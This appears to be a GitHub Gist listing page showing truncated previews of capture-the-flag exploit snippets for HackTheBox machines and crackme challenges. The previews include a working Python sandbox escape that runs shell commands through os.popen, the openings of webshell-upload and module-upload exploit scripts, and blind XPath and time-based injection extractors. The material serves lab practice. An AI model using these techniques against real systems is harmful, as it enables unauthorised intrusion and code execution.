Skip to content

Instantly share code, notes, and snippets.

View sharpicx's full-sized avatar

sharpicx

View GitHub Profile
@sharpicx
sharpicx / cypher.http
Created June 6, 2025 20:43
HTB: Cypher
POST /api/auth HTTP/1.1
Host: cypher.htb
Content-Length: 303
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
DNT: 1
Content-Type: application/json
Origin: http://cypher.htb
Referer: http://cypher.htb/login
@sharpicx
sharpicx / 1.py
Created June 6, 2025 20:42
HTB: Code
g = run_code.__globals__
m = g["s"+"ys"].modules
o = m["o"+"s"]
p = getattr(o, "p"+"o"+"pen")
c = p("id")
for x in c: print(x)
@sharpicx
sharpicx / a.py
Created June 6, 2025 20:40
HTB: TheFrizz
import requests
import sys
import base64
TARGET = "http://frizzdc.frizz.htb"
UPLOAD_PATH = "/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php"
SHELL_PATH = "/Gibbon-LMS/modules/Rubrics/rscreenshot_123456890.php"
COOKIE = {'G60fa1cd0af7be78b': '1vka2pu1otv1l3nnj5m0uugdsv'}
def generate_payload(cmd_param='1'):
@sharpicx
sharpicx / a.py
Created June 6, 2025 20:39
HTB: Nocturnal
import requests
import urllib.parse
import readline
from bs4 import BeautifulSoup
import re
from termcolor import colored
url = "http://nocturnal.htb/admin.php?view=admin.php"
headers = {
@sharpicx
sharpicx / a.py
Created May 14, 2025 23:36
time-based lagi
import requests
import json
import string
import copy
import time
import os
printable_chars = list(map(ord, string.printable)) + [0]
dashboard_token = None
extracted = ''
@sharpicx
sharpicx / a.java
Last active January 30, 2025 20:55
hm
import java.util.Base64;
import java.security.MessageDigest;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.util.HexFormat;
class Main {
public static byte[] f44153a = {104, 51, 94, 37, 52, 126, 115, 120, 106, 108, 115, 100, 57, 49};
@sharpicx
sharpicx / random2.cs
Last active January 26, 2025 20:42
https://crackmes.one/crackme/6756f8cf60fa67152406b648
using System;
using System.Text;
public class HelloWorld
{
public static void Main(string[] args)
{
string banner = "lIlIlIIIlIIllIlIlIIlIIlllIIlllIIlIIlIIIIlIIlIIlIlIIllIlIllIllllllIIIlIlllIIlIIIIllIllllllIlIllIIlIIlIllIlIIlIIlIlIIIlllllIIlIIlllIIlIllIlIIllIIllIIlIllIlIIllIlIlIIllIllllIllllllIllllIIlIIIllIllIIllllIlIIIIlIllIIIIllIlIIlllIIlIIIllIllIIllllIlIIlllIIlIIlIlIIlIllIIlIlIIllIlIllIllllI";
string pleaseEnterThePasswordKey = "lIlIlllllIIlIIlllIIllIlIlIIllllIlIIIllIIlIIllIlIllIllllllIIllIlIlIIlIIIllIIIlIlllIIllIlIlIIIllIlllIllllllIIIlIlllIIlIllllIIllIlIllIllllllIlIlllllIIllllIlIIIllIIlIIIllIIlIIIlIIIlIIlIIIIlIIIllIllIIllIllllIllllllIllIlIIlIIllIlIlIIIIllIllIIIlIlllIlllll";
string winString = "lIlIlIIIlIllIllIlIllIIIl";
@sharpicx
sharpicx / a.cs
Created January 26, 2025 17:57
random
using System;
using System.ComponentModel;
using System.Drawing;
using System.IO;
using System.Security.Cryptography;
using System.Text;
public class HelloWorld
{
public static void Main(string[] args)
@sharpicx
sharpicx / xpath.py
Created September 25, 2024 17:27
xpath
import requests
import string
import time
from requests.exceptions import ConnectionError
from pwn import log
ext = ""
i = 1
while True:
try:
@sharpicx
sharpicx / a.py
Last active June 6, 2025 20:40
HTB: GreenHorn
import requests
import readline
from requests_toolbelt.multipart.encoder import MultipartEncoder
def print_colored(text, color_code):
print(f"\033[{color_code}m{text}\033[0m")
def upload():
login_url = "http://greenhorn.htb/login.php"
upload_url = "http://greenhorn.htb/admin.php?action=installmodule"